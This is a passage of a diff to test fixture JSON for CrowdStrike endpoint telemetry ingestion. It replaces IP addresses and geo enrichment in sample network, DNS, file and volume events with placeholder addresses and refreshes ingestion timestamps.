"{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677512.700\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364796317497854624\",\"RemotePort\":\"443\",\"aip\":\"208.223.60.11\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4MacV10\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff96f142f6b2475f3c584ddd80\",\"RemoteAddressIP4\":\"208.208.21.205\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677512892\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150690400Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677512.700\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364796317497854624\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4MacV10\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff96f142f6b2475f3c584ddd80\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677512892\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:12.892Z", "kind": "event", "action": "NetworkConnectIP4", @@ -1726,24 +1503,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-DC", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "District of Columbia", - "location": { - "lon": -77.0148, - "lat": 38.8898 - } - }, - "address": "208.198.160.35", - "vendor": "crowdstrike", - "ip": "208.198.160.35", "serial_number": "ffffffff7ecf4e61bba14ca5ac5d17b1", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:35.806Z", "ecs": { @@ -1751,18 +1516,18 @@ }, "related": { "hosts": [ - "208.198.160.35" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.198.160.35" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465559800Z", - "original": "{\"event_simpleName\":\"DnsRequest\",\"ContextTimeStamp\":\"1625677475.806\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364977197365370629\",\"DomainName\":\"jss.dom1.com\",\"ContextThreadId\":\"0\",\"aip\":\"208.198.160.35\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"DnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-9644-060415b1fd87\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff7ecf4e61bba14ca5ac5d17b1\",\"timestamp\":\"1625677476111\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"28\"}", + "ingested": "2021-12-09T13:36:11.150696600Z", + "original": "{\"event_simpleName\":\"DnsRequest\",\"ContextTimeStamp\":\"1625677475.806\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364977197365370629\",\"DomainName\":\"jss.dom1.com\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"DnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-9644-060415b1fd87\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff7ecf4e61bba14ca5ac5d17b1\",\"timestamp\":\"1625677476111\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"28\"}", "created": "2021-07-07T17:04:36.111Z", "kind": "event", "action": "DnsRequest", @@ -1800,24 +1565,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WV", - "city_name": "Hurricane", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "West Virginia", - "location": { - "lon": -81.9947, - "lat": 38.4203 - } - }, - "address": "208.180.129.90", - "vendor": "crowdstrike", - "ip": "208.180.129.90", "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.770Z", "file": { @@ -1834,19 +1587,19 @@ }, "related": { "hosts": [ - "208.180.129.90" + "67.43.156.14" ], "hash": [ "2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9", "1620585913" ], "ip": [ - "208.180.129.90" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465566600Z", - "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677504.770\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"365053504406857894\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"208.180.129.90\",\"SHA256HashData\":\"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9\",\"FileIdentifier\":\"05000001000000000000000000000000b588050000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677540055\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/BitBar/countdown_timer.1s.py\"}", + "ingested": "2021-12-09T13:36:11.150702900Z", + "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677504.770\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"365053504406857894\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9\",\"FileIdentifier\":\"05000001000000000000000000000000b588050000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677540055\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/BitBar/countdown_timer.1s.py\"}", "created": "2021-07-07T17:05:40.055Z", "kind": "event", "action": "NewScriptWritten", @@ -1872,8 +1625,23 @@ "type": "linux" }, "source": { - "address": "ff88:1:1:ffff:440a:57ff:fe3a:8abc", - "ip": "ff88:1:1:ffff:440a:57ff:fe3a:8abc" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -1882,21 +1650,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffbfbf4ff5aa56a26ad3c1a942", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:26.386Z", "ecs": { @@ -1904,20 +1663,20 @@ }, "related": { "hosts": [ - "208.203.151.21", - "ff88:1:1:ffff:440a:57ff:fe3a:8abc" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1156120155" ], "ip": [ - "208.203.151.21", - "ff88:1:1:ffff:440a:57ff:fe3a:8abc" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465573400Z", - "original": "{\"InterfaceIndex\":\"186\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"event_platform\":\"Lin\",\"LocalAddressIP6\":\"ff88:1:1:ffff:440a:57ff:fe3a:8abc\",\"ConfigStateHash\":\"1156120155\",\"name\":\"LocalIpAddressRemovedIP6LinV1\",\"aip\":\"208.203.151.21\",\"id\":\"ffffffff-1111-11eb-b3c1-02ff598b7945\",\"aid\":\"ffffffffbfbf4ff5aa56a26ad3c1a942\",\"timestamp\":\"1625677526386\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150709200Z", + "original": "{\"InterfaceIndex\":\"186\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"event_platform\":\"Lin\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"name\":\"LocalIpAddressRemovedIP6LinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-b3c1-02ff598b7945\",\"aid\":\"ffffffffbfbf4ff5aa56a26ad3c1a942\",\"timestamp\":\"1625677526386\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:26.386Z", "kind": "state", "action": "LocalIpAddressRemovedIP6", @@ -1955,21 +1714,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.130.71.241", - "vendor": "crowdstrike", - "ip": "208.130.71.241", "serial_number": "ffffffff24db47799d1a85aae61dc7bc", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:59.994Z", "file": { @@ -1983,18 +1733,18 @@ }, "related": { "hosts": [ - "208.130.71.241" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.130.71.241" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465580200Z", - "original": "{\"event_simpleName\":\"DirectoryCreate\",\"ContextTimeStamp\":\"1625677499.994\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053555029062046\",\"ContextThreadId\":\"0\",\"aip\":\"208.130.71.241\",\"Flags\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"0\",\"Entitlements\":\"15\",\"name\":\"DirectoryCreateMacV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"VnodeType\":\"2\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff24db47799d1a85aae61dc7bc\",\"TargetDirectoryName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\",\"timestamp\":\"1625677500089\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\"}", + "ingested": "2021-12-09T13:36:11.150715400Z", + "original": "{\"event_simpleName\":\"DirectoryCreate\",\"ContextTimeStamp\":\"1625677499.994\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053555029062046\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"Flags\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"0\",\"Entitlements\":\"15\",\"name\":\"DirectoryCreateMacV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"VnodeType\":\"2\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff24db47799d1a85aae61dc7bc\",\"TargetDirectoryName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\",\"timestamp\":\"1625677500089\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\"}", "created": "2021-07-07T17:05:00.089Z", "kind": "event", "action": "DirectoryCreate", @@ -2032,44 +1782,14 @@ "type": "linux" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.216.236.59", "port": 443, - "ip": "208.216.236.59" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.210.109.249", "port": 40394, - "ip": "208.210.109.249" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -2078,27 +1798,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:WBJ0F0b/ydQaj5yTFJeZRrxW9nw=", + "community_id": "1:UVftVVD3gVlBx8wJQBdaiJYrD6A=", "transport": "tcp", "iana_number": "6", "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.129.250", - "vendor": "crowdstrike", - "ip": "208.233.129.250", "serial_number": "ffffffff58de4e748d9f64c85a9b49e6", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:17.658Z", "ecs": { @@ -2106,22 +1817,20 @@ }, "related": { "hosts": [ - "208.233.129.250", - "208.210.109.249", - "208.216.236.59" + "67.43.156.14", + "67.43.156.13" ], "hash": [ "1479784503" ], "ip": [ - "208.233.129.250", - "208.210.109.249", - "208.216.236.59" + "67.43.156.14", + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465587300Z", - "original": "{\"LocalAddressIP4\":\"208.210.109.249\",\"event_simpleName\":\"NetworkCloseIP4\",\"ContextTimeStamp\":\"1625677517.658\",\"ConfigStateHash\":\"1479784503\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"84424232977619\",\"RemotePort\":\"443\",\"aip\":\"208.233.129.250\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"40394\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP4LinV6\",\"id\":\"ffffffff-1111-11eb-9015-02e89cda7d5f\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff58de4e748d9f64c85a9b49e6\",\"RemoteAddressIP4\":\"208.216.236.59\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677517986\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150721900Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkCloseIP4\",\"ContextTimeStamp\":\"1625677517.658\",\"ConfigStateHash\":\"1479784503\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"84424232977619\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"40394\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP4LinV6\",\"id\":\"ffffffff-1111-11eb-9015-02e89cda7d5f\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff58de4e748d9f64c85a9b49e6\",\"RemoteAddressIP4\":\"67.43.156.13\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677517986\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:17.986Z", "kind": "event", "action": "NetworkCloseIP4", @@ -2162,21 +1871,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.93.153.49", - "vendor": "crowdstrike", - "ip": "208.93.153.49", "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:56.750Z", "ecs": { @@ -2184,18 +1884,18 @@ }, "related": { "hosts": [ - "208.93.153.49" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.93.153.49" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465594200Z", - "original": "{\"VolumeMediaName\":\"AppleAPFSMedia\",\"VolumeDeviceProtocol\":\"PCI-Express\",\"VolumeDeviceVendor\":\"\",\"ContextThreadId\":\"0\",\"VolumeMediaContent\":\"41504653-0000-11AA-AA11-00306543ECAC\",\"VolumeMediaEjectable\":\"0\",\"aip\":\"208.93.153.49\",\"VolumeAppearanceTime\":\"1625677422.647\",\"VolumeDeviceModel\":\"APPLE SSD SM0256L\",\"VolumeMediaBSDName\":\"disk1s3\",\"VolumeMountPoint\":\"/Volumes/Recovery\",\"event_platform\":\"Mac\",\"VolumeType\":\"APFS\",\"VolumeMediaRemovable\":\"0\",\"VolumeMediaBSDUnit\":\"1\",\"VolumeFileSystemDriver\":\"apfs\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"VolumeMediaSize\":\"250685575168\",\"EffectiveTransmissionClass\":\"2\",\"VolumeBusName\":\"IONVMeController\",\"timestamp\":\"1625677496804\",\"VolumeMediaBSDMinor\":\"8\",\"VolumeMediaWritable\":\"1\",\"event_simpleName\":\"FsVolumeMounted\",\"VolumeDevicePath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1\",\"VolumeName\":\"Recovery\",\"ContextTimeStamp\":\"1625677496.750\",\"VolumeSectorSize\":\"4096\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053546767850587\",\"VolumeBusPath\":\"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController\",\"VolumeDeviceInternal\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"VolumeUUID\":\"85400FAD-01F9-0442-8C5D-441F365D4909\",\"VolumeDeviceRevision\":\"CXS4LA0Q\",\"Entitlements\":\"15\",\"name\":\"FsVolumeMountedMacV1\",\"VolumeMediaBSDMajor\":\"1\",\"VolumeMediaPath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"VolumeMediaUUID\":\"AD0F4085-F901-4204-8C5D-441F365D4909\",\"VolumeMediaWhole\":\"0\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", + "ingested": "2021-12-09T13:36:11.150728200Z", + "original": "{\"VolumeMediaName\":\"AppleAPFSMedia\",\"VolumeDeviceProtocol\":\"PCI-Express\",\"VolumeDeviceVendor\":\"\",\"ContextThreadId\":\"0\",\"VolumeMediaContent\":\"41504653-0000-11AA-AA11-00306543ECAC\",\"VolumeMediaEjectable\":\"0\",\"aip\":\"67.43.156.14\",\"VolumeAppearanceTime\":\"1625677422.647\",\"VolumeDeviceModel\":\"APPLE SSD SM0256L\",\"VolumeMediaBSDName\":\"disk1s3\",\"VolumeMountPoint\":\"/Volumes/Recovery\",\"event_platform\":\"Mac\",\"VolumeType\":\"APFS\",\"VolumeMediaRemovable\":\"0\",\"VolumeMediaBSDUnit\":\"1\",\"VolumeFileSystemDriver\":\"apfs\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"VolumeMediaSize\":\"250685575168\",\"EffectiveTransmissionClass\":\"2\",\"VolumeBusName\":\"IONVMeController\",\"timestamp\":\"1625677496804\",\"VolumeMediaBSDMinor\":\"8\",\"VolumeMediaWritable\":\"1\",\"event_simpleName\":\"FsVolumeMounted\",\"VolumeDevicePath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1\",\"VolumeName\":\"Recovery\",\"ContextTimeStamp\":\"1625677496.750\",\"VolumeSectorSize\":\"4096\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053546767850587\",\"VolumeBusPath\":\"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController\",\"VolumeDeviceInternal\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"VolumeUUID\":\"85400FAD-01F9-0442-8C5D-441F365D4909\",\"VolumeDeviceRevision\":\"CXS4LA0Q\",\"Entitlements\":\"15\",\"name\":\"FsVolumeMountedMacV1\",\"VolumeMediaBSDMajor\":\"1\",\"VolumeMediaPath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"VolumeMediaUUID\":\"AD0F4085-F901-4204-8C5D-441F365D4909\",\"VolumeMediaWhole\":\"0\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:04:56.804Z", "kind": "event", "action": "FsVolumeMounted", @@ -2249,27 +1949,9 @@ "type": "linux" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "VI-C", - "city_name": "Christiansted", - "country_iso_code": "VI", - "country_name": "U.S. Virgin Islands", - "region_name": "Saint Croix Island", - "location": { - "lon": -64.7056, - "lat": 17.7468 - } - }, - "as": { - "number": 14434, - "organization": { - "name": "VI POWERNET, LLC" - } - }, - "address": "208.30.117.28", "mac": "0e-d6-ff-ff-ff-63", - "ip": "208.30.117.28" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -2278,21 +1960,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.54.217", - "vendor": "crowdstrike", - "ip": "208.233.54.217", "serial_number": "ffffffff190e436aaebc3892bcda5beb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:14.374Z", "ecs": { @@ -2300,20 +1973,18 @@ }, "related": { "hosts": [ - "208.233.54.217", - "208.30.117.28" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.233.54.217", - "208.30.117.28" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465601100Z", - "original": "{\"LocalAddressIP4\":\"208.30.117.28\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677513.841\",\"aip\":\"208.233.54.217\",\"PhysicalAddress\":\"0e-d6-ff-ff-ff-63\",\"InterfaceAlias\":\"eth0\",\"InterfaceIndex\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP4LinV1\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffff190e436aaebc3892bcda5beb\",\"timestamp\":\"1625677514374\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150734500Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677513.841\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"0e-d6-ff-ff-ff-63\",\"InterfaceAlias\":\"eth0\",\"InterfaceIndex\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP4LinV1\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffff190e436aaebc3892bcda5beb\",\"timestamp\":\"1625677514374\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.374Z", "kind": "state", "action": "LocalIpAddressIP4", @@ -2342,8 +2013,23 @@ "type": "macos" }, "source": { - "address": "ff88:1:1:ffff:442a:7bff:fe75:9ed", - "ip": "ff88:1:1:ffff:442a:7bff:fe75:9ed" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -2352,21 +2038,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:40.056Z", "ecs": { @@ -2374,20 +2051,20 @@ }, "related": { "hosts": [ - "208.165.30.176", - "ff88:1:1:ffff:442a:7bff:fe75:9ed" + "67.43.156.13", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176", - "ff88:1:1:ffff:442a:7bff:fe75:9ed" + "67.43.156.13", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465607800Z", - "original": "{\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"LocalAddressIP6\":\"ff88:1:1:ffff:442a:7bff:fe75:9ed\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"InterfaceIndex\":\"8\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP6MacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150740700Z", + "original": 